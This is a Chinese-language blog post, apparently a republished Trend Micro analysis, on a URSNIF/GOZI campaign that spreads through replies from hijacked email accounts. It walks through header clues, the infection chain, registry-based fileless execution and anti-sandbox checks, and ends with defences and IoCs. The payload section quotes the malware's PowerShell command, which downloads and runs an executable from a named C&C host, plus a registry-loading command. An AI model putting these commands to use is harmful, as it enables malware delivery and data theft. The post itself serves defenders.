top of page
Search
Writer's pictureIYP

⚠️ 渔艺正在升级:URSNIF 恶意软件新变种通过回复邮件即可实现传播

攻击者正在采取更为复杂的网络钓鱼。由于网络钓鱼攻击依赖于社会工程技术,因此它们往往非常有效。这些技术会创建一些可信的场景或对话,从而诱使用户泄漏信息,或下载恶意软件。在本文的案例中,最棘手的问题在于发件人是真实的用户……


大多数网络钓鱼活动,其本质非常简单,并且易于发现。攻击者往往会发送一些看似合法的电子邮件,并在其文本中嵌入恶意链接,或在邮件中添加恶意附件。然而,趋势科技在今年9月监测到的恶意邮件活动却表明,攻击者正在采取更为复杂的网络钓鱼形式。


该恶意活动会盗取电子邮件账户,并对邮箱中已有的邮件内容进行回复,在回复的内容中附带恶意软件。对已有邮件的回复,实际上是连续通信中的一部分,因此这种特殊的钓鱼方式难以被用户发现,也难以检测。通常,受害者都没有意识到他们正在遭受钓鱼邮件的威胁。


这些攻击与今年早些时候 Talos 发现的 URSNIF/GOZI 恶意邮件活动非常相似,该恶意活动使用暗云僵尸网络中部分被劫持的计算机向已有邮件发送回信,很可能是 URSNIF/GOZI 恶意邮件活动的升级版本或演变版本。


根据迄今为止收集到的数据,趋势科技发现该恶意活动主要影响北美和欧洲地区,同时在亚洲和拉丁美洲地区也发现了类似的攻击。


本次恶意活动的主要目标是教育、金融和能源行业。然而,此次恶意活动还影响到了其他行业,包括房地产、交通运输、制造业和政府。


捕获样本


趋势科技发现了该恶意活动的一个示例,并对电子邮件的内容进行了截图,如下所示:

Figure 1. Example of a malicious email that is used to reply to a conversation

由于发件人是一位熟悉的人,并且邮件也是往来对话中的一部分,因此作为收件人,很容易会相信这只是对此前邮件内容的另一封回复邮件。此外,该回复的标题和语法似乎都是正确的,甚至在电子邮件的末尾还附带了签名


当然,如果仔细检查,会发现这封电子邮件中存在一些可疑的地方。最明显之处在于,使用的语言从法语变成了英语。此外,恶意电子邮件中的签名与合法电子邮件的签名是不同的。最后还有一点,就是该邮件的内容是通用的,所以可能会偏离原来的交流内容。尽管不能通过这些因素,直接判断出这封邮件是恶意的,但至少能够提起警惕。然而,如果不经仔细阅读,这些小细节可能难以发现,特别是那些每天有大量邮件往来的人。


Figure 2. Comparison between the malicious email and a legitimate one. Note the difference in language and the changed signature

擦亮眼睛!分析电子邮件头部信息


在对电子邮件的头部信息进行检查后,发现了该攻击的一些有趣之处。

Figure 3. The anonymized email header of the malicious message (click the image to zoom in)

⚠️ 在这里,有3个地方需要注意


1、通常,恶意邮件都会伪造发件人,会使用 “Return-Path” 或 “Reply-To” 的 SMTP 头部,以便收件人能够将邮件直接回复给恶意攻击者。而在观察到的示例中,没有这两个头部信息,并且所有回复都会发送至发件人(也就是被攻陷的邮箱账户)。这就说明攻击者可能已经通过了发件人邮箱的身份验证。


2、“In-Reply-To”头部(或其他类似的 SMTP 头部字段)表示这封邮件是对已有电子邮件通信的回复。


3、这封电子邮件的第一跳(The First Hop)来自于 “rrcs-50-74-218-2[.]nyc[.]biz[.]rr[.]com”,这个地址对于家庭用户来说并不常见。对于组织用户来说,除非邮件是来自远程的服务,否则邮件都应该是从组织内部的服务器发送(例如:一个“sender.co.ca”域内的主机)。


考虑到这些因素,可以看出这封电子邮件是从美国发出的。而根据示例中发件人邮箱的域名 .ca,这封邮件应该是发自加拿大。


经过进一步的调查,发现该域名在2018年9月期间使用了多个电子邮件地址,发送了大量不同的电子邮件。


攻击者经常会将附件的文件名与发件人的组织名称相对应,这样就有可能使得邮件看起来更加真实。附件文件名的格式通常是[发件人所在组织]+[与此前通信相关的一个动词,例如“查询”或“请求”].doc,或者就是简单的 [发件人所在组织].doc。这样的附件,使这封邮件不容易被人怀疑。在部分恶意活动中,我们看到附件使用了通用的文件名,例如“查询”、“声明”和“请求”。


根据邮件的标题,可以假定,攻击者通过某种方式获得了真实的邮箱账户,并且将该邮箱账户用于类似 BEC 的骗局之中。考虑到其运作方式和使用的技术,怀疑这一新的恶意邮件活动是 URSNIF/GOZI 恶意邮件活动的一部分。发送方的IP地址,可能是僵尸网络中被感染的主机之一。


对 Payload 的分析


一旦用户双击电子邮件中的恶意.doc附件,就会调用 PowerShell 从 C&C 服务器下载最新版本的 URSNIF(检测为 TSPY_URSNIF.THAOOCAH)恶意软件:

  • powershell $VWc=new-object Net.WebClient;$wIt=’http: //t95dfesc2mo5jr. com/RTT/opanskot.php?l=targa2.tkn’.Split(‘@’);$jzK = ‘369’;$Aiz=$env:public+’\’+$jzK+’.exe’;foreach($fqd in $wIt){try{$VWc.DownloadFile($fqd, $Aiz);Invoke-Item $Aiz;break;}catch{}}


该文件是恶意软件的主要加载程序。但是,在执行其例程之前,它首先会检查操作系统版本,只允许在 Microsoft 操作系统上执行,特别是 Windows Vista 及以上版本。此外,它会避免在某些语言环境中运行,例如 CN(中国)和 RU(俄罗斯)


主加载器负责管理整个执行过程,并将事件记录在文本文件中:

  • %User Temp%\{temp filename}.bin

Figure 4. Logs of the malware’s loader (click the image to zoom in)

它会从 C&C 服务器下载其他模块,并将它们保存在注册表文件夹 HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\3A861D62-51E0-15700F2219A4中。


下图展示了创建的注册表项,以及包含脚本和二进制文件的条目。


Figure 5. The registry key and entries containing scripts and binaries

请注意,尽管这些键和部分注册表项的名称在不同计算机上不尽相同,但其位置始终位于 HKCU\Software\AppDataLow\Software\Microsoft\。


在下载组件后,会执行存储在 comsxRes(此名称可能会发生变化)中的 PowerShell 脚本。下面的命令行指令展示了如何调用注册表中的十六进制值。

  • exe /C powershell invoke-expression([System.Text.Encoding]::ASCII.GetString((get-itemproperty ‘HKCU:\Software\AppDataLow\Software\Microsoft\3A861D62-51E0-7C9D-AB0E-15700F2219A4’).comsxRes

Figure 6. Hex values of comsxRes

当此脚本加载存储在注册表中的嵌入式二进制文件时,无文件执行就开始了。在下图中,用–{hex-encoded binary}—替换了二进制数据,从而能展现出全部代码。原始脚本的最底部部分也是使用了 Base64 编码,对其进行了解码,以保证可读性。


Figure 7. Code of the embedded binary that is stored in the registry

恶意程序会在创建的注册表项中搜索 Client32/Client64,并将该代码注入到 explorer.exe 以保证可以持续保留在内存中。注册表中的其他条目在后续例程运行过程中是必不可少的,因为这些条目会被注入的恶意软件代码所引用。例如,“TorClient” 条目指定了恶意软件如何通过 Tor 网络与其 C&C 服务器通信。


五、分析信息窃取例程


最终的 Payload 是一个名为 Client32 或 Client64 的 DLL 文件,具体取决于主机的体系架构。它也如同大多数恶意软件的组件一样,存储在注册表中。最终 Payload 的主要目标是进行信息窃取,其中包括以下信息:


· 系统信息

· 已安装的应用程序列表

· 已安装的驱动程序列表

· 正在运行的进程列表

· 网络设备列表

· 外网IP地址

· 电子邮件凭据(IMAP、POP3、SMTP)

· Cookie

· 证书

· 屏幕视频捕获(AVI 格式)

· 通过网页劫持获得的财务相关信息


BSS 段加密


在趋势科技所分析的所有 URSNIF 二进制文件中,都包含这个加密部分。在这一部分中,包含着将在代码中使用的所有相关字符串,并且仅会在恶意程序运行时解密。因此无法对字符串进行分析,也无法进行反编译,使得整个分析过程更为复杂。


恶意软件的反分析机制


为了防止研究人员通过沙箱获取到服务器和配置等信息,URSNIF 会在运行时两次检查光标的位置。如果光标位置不发生变化,那么就说明该恶意软件可能正在沙箱中进行分析,或是正在通过调试器进行分析。反分析的检查将在BSS部分被解密之前完成。如果发现存在问题,那么就会导致该恶意程序进入无限循环,并产生乱码字符串。


根据在这次攻击中所看到的情况,似乎攻击者正在不断对他们的网络钓鱼攻击方式进行更新,并探索更能有效迷惑用户的方法。这些网络攻击者不再满足于常规的钓鱼邮件,而是将他们的攻击巧妙的整合到正在进行的对话中,这就使得普通用户难以发现。这样的升级,其实正是攻击者和安全人员之间永无止境的猫捉老鼠游戏中的一部分。


防范方法


由于网络钓鱼攻击依赖于社会工程技术,因此它们往往非常有效。这些技术会创建一些可信的场景或对话,从而诱使用户泄漏信息,或下载恶意软件。在本文的案例中,最棘手的问题在于发件人是真实的用户。由此提醒大家,应该尽可能通过双因素身份认证(2FA)来保护自己的网络账户。此外,作为组织,还应该考虑将双因素身份认证集成到系统之中,并且为组织中的成员提供可靠的认证。


⚠️ 此外,要防范网络钓鱼,还应注意以下几点

  • 组织中的所有用户都应具备足够的安全意识,了解网络钓鱼攻击的概念、网络钓鱼攻击的常见手段和识别可疑电子邮件的方法。

  • 遇到任何可疑的请求时,都应进一步与相关人员进行核实,特别是在进行金融交易之前,务必要谨慎操作。

  • 避免打开任何建议修改 Word 中安全配置的文档,这样的文档很有可能是恶意文件。

  • 留意邮件中所有可疑之处,包括是否符合对话的上下文、是否使用了你们常用的语言、是否使用的是常用的邮件签名。


使用可管理的检测与响应服务(MDR)


随着网络钓鱼攻击方式的日益复杂,组织内部的IT团队和安全团队可能难以监控网络和各个终端是否存在被攻击的迹象。尽管提升员工的安全意识有助于防范威胁,但如果要让员工识别精心伪造的电子邮件,还是具有一定的难度。


针对没有安全运营中心(SOC)的组织而言,就面临这一个双重挑战,因为一般的 IT 团队往往缺乏进行威胁研究和分析的经验。针对这些组织,建议采用第三方安全厂商的“可管理的检测与响应服务”(MDR),从而帮助抵御高级威胁。Mdr 可以为攻击中的各种环境指标提供一个基线,并且使用这些指标作为安全分析的基础。


IoC


Word文件的哈希值


检测为TROJ_FRS.VSN0BI18 / Trojan.W97M.POWLOAD.SMY:

  • bdd3f03fb074c55cf46d91963313966ce26afdb13b1444258f8f9e7e723d8395

  • dd7b4fc4d5cc1c1e25c800d5622423725a1b29000f93b658a54e267bbbe6f528

  • 4df47982fdd1ac336625600fa8c947d45909248309b117d05fc532a2260c7bc4

检测为Trojan.W97M.POWLOAD.FGAIBT:

  • f88ef62f2342f4d1105cfe85395b735efd3f0308b79551944983ce245d425510

  • 567fe3794a9eec27697ae0634861d284279261880887f60a7374c6cbe63b7674

检测为Trojan.W97M.POWLOAD.NSFGAIBF:

  • 52d3ece98b6b3b686925156c3d62d8ce133fe3326e11b4c981c251452e4a41d2

检测为Trojan.W97M.POWLOAD.SMEMOT:

  • 4d0762a6b2879d2fa821716db76bc980fdb3b8507611d2853df58c0d4127f9ea

检测为Trojan.W97M.POWLOAD.SMEMOT2:

  • 47e2c66ba16e3ffa9704a13f2c00670319bf292b3d2aa7deede5442da02181e5

  • c2c946f7fd63fc15048a9af4043686f5a56b169e74cb36892fb8d1563b810467

检测为Trojan.W97M.POWLOAD.SMTHF3:

  • 21ce42a1fc6631ed10db3d0e44b4ccb6d96a729fc494bd86a57cf07ff72cb8f2

检测为Trojan.W97M.POWLOAD.SMY:

  • de8f8f39259992886da3b07635cbf121027379e5c1a156a32c6c6e5ace3cc4c3

  • 6b387b8534da9cc7cf0af4f2fb8c2a92f9316c0ea6ffb9cfe49b09b4c3df9778

  • 6bf99f4b17a07e788219333d96a7a19c9eddc1b49d16c2a21da255a6a16c80d5

  • 33d078881456e3b930c480803902fa28142b17c8550f3932e7cf4a1df0eb9213

  • 6ca2d4dcea456b9d4c87f211ed20bb32f71a0c78ee8059b934162e643d66e0c9

  • 82bee0c249b63f349d212a36f0b9ad90f909017ac734eac133353a1135d7474d

  • 1f2e12a58cc23f4e6e7f17b8c1a5c50b88614fda103577354b9564f2dffc257f

检测为W2KM_POWLOAD.FGAIBT:

  • 1db71aec64d0e391a8c99f4f6ee214962a281733643ace0874cf69e2843f448c

检测为W2KM_POWLOAD.NSFGAIBF:

  • c33d642da477f65c11daa9e8098b9917c4c5a6f131dd1369a20cb1b14c4cc261

  • 398e677290b1db00d8751c3498847ad9c7d10721630175d2506c4d45af19d229

  • 813a08d3b2216c89d42e8225c6de760d785905d1c76bd7428201d68c3c368f65

检测为W2KM_POWLOAD.THIACAH:

  • 5aed7d6a3e8692143e53f9556cd3aa371149c96b91c02d1c659cb58d88572e47

下载的URSNIF


检测为TSPY_URSNIF.THAOOCAH:

  • 0a38d92775cfc7182076d9a21c4937149ea8be6ebf22b9530afbca57d69c0d46

可执行文件Payload


检测为TrojanSpy.Win32.URSNIF.BAIEF:

  • 358bd52ac46755b1c6fa73805a7a355450f85f4bcf1b2e798a04960743390422

检测为TSPY_URSNIF.THAOOCAH:

  • e8633f2f2b6b0b8f7348b4660e325ab25b87ec8faa40fb49eb0215b31bd276aa

检测为TSPY_URSNIF.BAIEB:

  • f92ba10fe245c00575ae8031d4c721fe0ebb0820a4f45f3bbce02654a6e7f18d

下载URL

  • hxxp://t95dfesc2mo5jr[.]com/RTT/opanskot[.]php?l=targa2[.]tkn

  • hxxp://enduuyyhgeetyasd[.]com/RTT/opanskot[.]php?l=omg8[.]tkn

  • hxxp://q0fpkblizxfe1l[.]com/RTT/opanskot[.]php?l=targa4[.]tkn

  • hxxp://2dhtsif1a8jhyb[.]com/RTT/opanskot[.]php?l=okb1[.]tkn

  • hxxp://yrtw1djmj6eth7[.]com/RTT/opanskot[.]php?l=okb7[.]tkn

  • hxxp://popoasdzxcqe[.]com/YUY/huonasdh[.]php?l=rgr7[.]tkn

  • hxxp://q0fpkblizxfe1l[.]com/RTT/opanskot[.]php?l=targa2[.]tkn

  • hxxp://e3u1oz4an1dqmj[.]com/RTT/opanskot[.]php?l=okb9[.]tkn

  • hxxp://popoasdzxcqe[.]com/YUY/huonasdh[.]php?l=rgr3[.]tkn

  • hxxp://2dhtsif1a8jhyb[.]com/RTT/opanskot[.]php?l=okb5[.]tkn

  • hxxp://hbhbasdqweb[.]com/YUY/huonasdh[.]php?l=rgr4[.]tkn

  • hxxp://q0fpkblizxfe1l[.]com/RTT/opanskot[.]php?l=targa4[.]tkn

C&C 服务器

  • app[.]kartop[.]at

  • doc[.]dicin[.]at

  • doc[.]avitoon[.]at

  • app[.]avitoon[.]at

  • ops[.]twidix[.]at

  • xx[.]go10og[.]at

  • api[.]kartop[.]at

  • m1[.]fofon[.]at

  • cdn[.]kartop[.]at

  • api[.]tylron[.]at

  • chat[.]twidix[.]at

  • api[.]kaonok[.]at

  • chat[.]jimden[.]at

  • mahono[.]cn

趋势科技 XGen™安全性提供跨代混合的威胁防御技术,以保护系统免受各种类型的威胁,包括勒索软件和加密货币挖掘恶意软件。在网关和端点上具有高保真的机器学习功能,可以保护物理、虚拟和云工作负载。借助 Web / URL 过滤,行为分析和自定义沙盒等功能,XGen 安全可以抵御当今绕过传统控制的威胁,利用已知、未知或未公开的漏洞,窃取或加密个人身份数据、或进行恶意加密货币挖掘的威胁。◾️


感谢帮助 iYouPort

PayPal 捐赠渠道已开通 https://paypal.me/iyouport

17 views0 comments

コメント


bottom of page